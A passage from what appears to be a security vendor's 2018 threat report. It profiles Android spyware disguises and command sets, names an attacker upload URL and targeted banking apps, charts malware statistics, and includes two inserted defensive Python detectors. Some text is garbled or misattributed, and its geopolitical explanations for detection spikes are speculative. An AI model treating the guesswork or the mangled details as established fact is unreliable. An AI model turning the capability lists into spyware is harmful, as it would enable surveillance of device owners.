The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional spying abilities. It steals account details: contacts, ID, name, phone numbers and email address of the owner. It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type) and photos of the contacts. After extracting all the data, the malware encrypts it with the AES algorithm and sends it to the attackers' server httphttpcgalimcomadminhrpupuphpdo=upload

KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.

The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim's activity. Then it sends the video to the attackers' server.

Version-3 of KevDroid takes photos, records calls and creates a list of files on the device. It also extracts the web history, account and contact details, and device information.

People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment the spyware constantly kept track of all events on the infected device. Another means of the malware's dissemination was social networks.

Version-1 Dardesh Google Play Services Instant Apps

Version-2 Settings

Disguises of Desert Scorpion

The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages, and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts metadata and makes changes on the victim's device.


4.1.2 Zoo Park

The next member of the spy family, Zoo Park, has 4 different versions:

Version-1 Telegram Groups انتخاب دھم

Version-2 Postrall Yes For Referendum انتخاب دھم

Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机

Version-4 VPN Easy DroFirewall m_android

Disguises of Zoo Park

The first version tries to impersonate the Telegram app. It extracts account and contact details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, network operator name, SDK version, OS version, etc.), call log details and external storage content.

The third version is included in spyware named "Spymaster Pro" and can:

Enable and disable the GPS services

Record audio and send it to the Command & Control server

Upload image files

Collect information about the applications installed

Collect browser data

Send SMS and read outgoing SMS

The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.


In addition to the abilities of the previous versions, it includes some additional tricks:

Extracts photos, audio and video

Records screen

Executes shell commands

Records calls

4.1.3 MikeSpy

Some spyware examples specifically hunt for messengers' data, like the next digital spook, MikeSpy.

Virtual Girlfriend

Disguises of MikeSpy

MikeSpy camouflaged itself as a Virtual Girlfriend application. But instead of a girlfriend, it has a bundle of malicious abilities:

Takes control of the Bluetooth adapter

Extracts data about accounts, contact details and installed apps

Extracts data from the WhatsApp Message DB and related keys

Uploads the collected data to the cybercriminals' server via FTP

4.1.4 Xloader

The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.

Version-1 to Version-3: FaceBook, Chrome

Disguises of Xloader


After infection, Xloader connects to its C&C server and executes the following commands:

Extract the device information

Delete SMS

Set ringer mode

Monitor incoming SMS messages

Clear memory

Check for the presence of the following banking applications: comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbs

Extract contacts details

Set Wi-Fi to always on

Version 2 can execute additional commands:

Send SMS and read outgoing SMS

Enable and disable a Wi-Fi connection

Access a location specified by the attackers

Make recordings

Make calls

4.1.5 Stalker Spy

The next malware in the row is Stalker Spy. As you can see, it is the champion in the number of masks it puts on to deceive users.

App Distribution

FlexiSpy MBackup

HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service


Mobile Spy

随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z

CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻

Disguises of Stalker Spy

In addition to the usual must-have spyware set, Xloader can remotely turn on the microphone of the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.

4.1.6 Mystery Bot

The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption, the malware deletes the original files. So we can call it a spy with a "007 license".

Version-1 Adobe Flash Player

Version-2 Flash Player

Disguises of Mystery Bot

Mystery Bot comes under the cover of Adobe Flash Player. Below is a list of some of the commands the malware can execute on your device:


Send_SMS - extract SMS content and send it to the C&C server

Send_USSD - send the USSD to the C&C server

Gethistory - monitor browser history

Start_AllApp - gather info about installed applications

Send_call - set the Intent action to call

Forward_call - forward incoming calls

ResForward_call - reset the call forwarding

Go_Smsmnd - delete SMS content

Go_GetAlls - get SMS history

Dell_sms - delete SMS content in a conversation

Send_spam - send spam SMS

Start_Inject - call the injectors class

4.1.7 FakeSpy

FakeSpy also has many masks, which you can see in the screenshot:

佐川急便 현대캐피탈

Disguises of FakeSpy

It collects available information from the infected device and sends it to the C&C servers. It also checks for the following banking applications: aucomapp softbankcomapp docomocomapp

Here are some of the commands from its Command and Control server:

contacts - Get contact details and email ID

Mute - Set action to mute

Mms - Get MMS content

info - Get device information


4.1.8 RedAlert

RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.

Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber

Version-2 Update Google Market Flash Player Tactic FlashLight

Disguises of RedAlert

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:

depostbankfinanzassistent

plmbank

aibibankandroid

The second version can also block access to some websites, including Google Chrome, Google Play store, Gmail and YouTube.

4.1.9 Hero Rat

The next digital spook, Hero Rat, mostly operates on Iranian territory. It uses third-party app stores, social networks and messengers for spreading.

Version 1

CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره

Proxy دوست یاب Telegram Ton

Global Threat Report Q2 2018 Edition

Page 35 of 73

شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان

Disguises of Hero Rat

Its code is available on the Telegram hacking channel Noticeably that itrsquos sold in three options bronze silver and gold

After infiltration into a victimrsquos device Hero Rat shows a warning like app canrsquot be runrdquo But it runs in the background and starts the spying activity It steals text messages audio records makes calls detect device location etc The newly infected device is controlled via Telegram bot functionality

Hero Rat disguises as Bitcoin Free Internet Connection Get free Followers and Telegram versions for Iranian market

4.1.10 Sonvpay

The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.

Version 1

Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot

Reccoder-Call, QRCodeBar Scanner APK

Let me love you ringtone, Iphone Ringtone, Night light

Beauty camera-Photo editor, Shape of you ringtone

Disguises of Sonvpay


Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip option". If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.

It comes to victims in a variety of disguises, named below.

4.1.11 CoinHive

The last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report; here is the version for Android devices. CoinHive for Android comes in three versions, each of which upgrades its mining capability. It is disseminated via the counterfeit apps you see below, but one of the vectors is especially interesting.

Version 1: Netflix Hack, Instagram Hack

Version 2: TSF Launcher

Version 3: Android Service, PlacarTv Futebol Ao Vivo

Disguises of CoinHive

The malware is covertly propagated via... another cryptominer named CoinMiner.

How is that possible? Let's imagine a cybercriminal who wants to infect victims with a cryptominer to use their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that another cybercriminal earlier infected CoinMiner with CoinHive. So the first attacker is a victim too: thief robbing thief.

This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.


4.2 Android Malware Catalogued by Month

Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

[Chart: Android-targeted malware in April]

4.2.2 May 2018

[Chart: Android-targeted malware in May]

4.2.3 June 2018

[Chart: Android-targeted malware in June]


5 Malware in Q2 2018: The Big Picture

Above is a visualization of malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.


5.1 Strategic Threat: Computer Worms

A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial-of-service. For this Q2 2018 Report we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.


5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.


5.1.2 Net Worms

A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses it from a local area network (LAN) or company intranet.

In Q2 2018, Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded, polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.


5.1.3 Email Worms

Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.

This quarter the most common Email Worm, by far, was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2.


5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files, such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.


5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that, while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.


5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.


5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.


5.2.2 Viruses

A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.


5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.


5.2.4 Exploits

Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial-of-service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.


5.3 Medium Threat Malware

In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.


5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.


5.3.2 Packers

Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems, and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.

In Q2 2018 Russia was the #1 home of malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
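Because a modified UPX build can rename the tell-tale section names, a defender cannot rely on names alone; the compressed or encrypted body still has near-maximal byte entropy, which is what the packer description above implies. The following Python is an added example, not Comodo's or UPX's code: it scores a simplified section table (a dict of section name to raw bytes standing in for a parsed PE section table; it does not parse real PE files) on both the stock UPX section names and Shannon entropy. The 7.0 bits/byte threshold, the 256-byte minimum section size and the three constructed samples are assumptions of the example.

```python
import math
import random
from collections import Counter
from typing import Dict, List

# Section names written by a stock UPX build. A modified UPX (MUPX) often
# renames them, which is why the entropy check below is the one that matters.
KNOWN_PACKER_SECTIONS = {"UPX0", "UPX1", "UPX2"}

# Assumed threshold for this example: compressed or encrypted data sits close
# to the 8.0 bits/byte maximum, while ordinary x86 code and ASCII data sit
# well below 7.0.
ENTROPY_THRESHOLD = 7.0
MIN_SECTION_SIZE = 256   # tiny sections give unreliable entropy estimates


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for empty input, at most 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def packing_indicators(sections: Dict[str, bytes]) -> List[str]:
    """Score a simplified section table (name -> raw bytes) and return one
    line per indicator found. This stands in for a parsed PE section table;
    it does not parse real PE files."""
    indicators = []
    for name, body in sections.items():
        if name in KNOWN_PACKER_SECTIONS:
            indicators.append(f"{name}: stock UPX section name")
        entropy = shannon_entropy(body)
        if len(body) >= MIN_SECTION_SIZE and entropy >= ENTROPY_THRESHOLD:
            indicators.append(f"{name}: high entropy ({entropy:.2f} bits/byte)")
    return indicators


def is_probably_packed(sections: Dict[str, bytes]) -> bool:
    return bool(packing_indicators(sections))


def build_samples() -> Dict[str, Dict[str, bytes]]:
    """Three constructed section tables (not real binaries)."""
    rng = random.Random(2018)
    # Stand-in for ordinary code: repetitive text-like bytes, low entropy.
    plain_code = b"mov eax, [ebp+8]; call 0x401000; test eax, eax; jz short; ret\n" * 80
    # Stand-in for a compressed payload: uniformly random bytes, high entropy.
    packed_blob = bytes(rng.getrandbits(8) for _ in range(4096))
    return {
        "unpacked":     {".text": plain_code, ".data": b"\x00" * 512 + b"Hello" * 64},
        "stock_upx":    {"UPX0": b"", "UPX1": packed_blob, ".rsrc": b"\x00" * 128},
        # Same payload but with the section names changed, as MUPX would do.
        "modified_upx": {".text": packed_blob, ".rdata": b"\x00" * 128},
    }


if __name__ == "__main__":
    for label, table in build_samples().items():
        print(f"{label}: packed={is_probably_packed(table)} {packing_indicators(table)}")
```

The "modified_upx" sample is the instructive one: the name check finds nothing, and only the entropy of the renamed ".text" section gives the packing away. In practice the entropy threshold is tuned per file type, since legitimate installers and media resources also contain compressed data.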


5.3.3 Email Flooder

Email Flooders are malware used to overwhelm email servers with messages in order to "kill" them or shut them down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that, while the number of Palevo detections was not high, it was still a persistent threat in Germany.


5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.


5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but still something to be aware of.


5.4 Low Threat Malware Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.


5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018 the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.


5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.


5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs, but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.


6 Vertical Analysis

In this section let's examine unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.


First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.

In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks; second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.


7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities. After which, these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.


7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.


7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers; spies collect data for intelligence reports.


7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the number of usual detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
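The "well over ten times the usual level" reasoning used throughout this chapter can be made reproducible with a few lines of code. The following Python is an added example and not Comodo's tooling: it flags days whose detection count is at least a chosen multiple of the median of the preceding two weeks, and runs on a constructed daily-count series for Q2 2018 (a baseline of 20 to 40 detections per day with one planted spike on May 2 and one smaller bump on May 20). The ten-times factor and the 14-day baseline window are assumptions of the example, not figures from the report.

```python
from datetime import date, timedelta
import random
from statistics import median
from typing import Dict, List, Tuple

SPIKE_FACTOR = 10.0   # assumption: "well over ten times the usual level" counts as a spike
BASELINE_DAYS = 14    # assumption: the usual level is the median of the previous two weeks


def find_spikes(series: Dict[date, int],
                factor: float = SPIKE_FACTOR,
                window: int = BASELINE_DAYS) -> List[Tuple[date, int, float]]:
    """Return (day, count, ratio) for every day whose count is at least
    `factor` times the median count of the `window` preceding days.

    The median, unlike the mean, is not dragged upward by one huge day, so a
    spike does not hide the days that follow it. The first `window` days have
    no baseline and are never flagged."""
    days = sorted(series)
    spikes = []
    for i in range(window, len(days)):
        baseline = median(series[d] for d in days[i - window:i])
        baseline = max(baseline, 1.0)   # a zero baseline would make any count infinite
        ratio = series[days[i]] / baseline
        if ratio >= factor:
            spikes.append((days[i], series[days[i]], ratio))
    return spikes


def build_q2_sample() -> Dict[date, int]:
    """Constructed sample, not real telemetry: one detection count per day of Q2 2018."""
    rng = random.Random(42)
    start = date(2018, 4, 1)
    series = {}
    for i in range(91):                       # 1 April .. 30 June 2018
        series[start + timedelta(days=i)] = rng.randint(20, 40)
    series[date(2018, 5, 2)] = 450            # planted spike, roughly 11x to 22x the baseline
    series[date(2018, 5, 20)] = 80            # planted bump, 2x to 4x: below the threshold
    return series


if __name__ == "__main__":
    for day, count, ratio in find_spikes(build_q2_sample()):
        print(f"{day.isoformat()}: {count} detections, {ratio:.1f}x the usual level")
```

Run as a script, the output lists only the May 2 spike; the May 20 bump stays below the factor, which is the distinction an analyst wants before attributing a peak to a geopolitical event.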


7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.


7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.


7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart, showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.


7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".


7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.


8 Conclusions

In Q2 Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.

NORTH AMERICA: Comodo Security Solutions, Inc., 1255 Broad Street, Clifton, NJ 07013, United States. Tel: +1 (888) 551 1531, Tel: +1 (888) 266 6361, Int: +1 (703) 581 6361, Fax: +1 (973) 777 4394, sales@comodo.com

EUROPE: Comodo Security Solutions, Inc., Șoseaua Națională 31, Iași 700237, Romania. +40 332 806 772

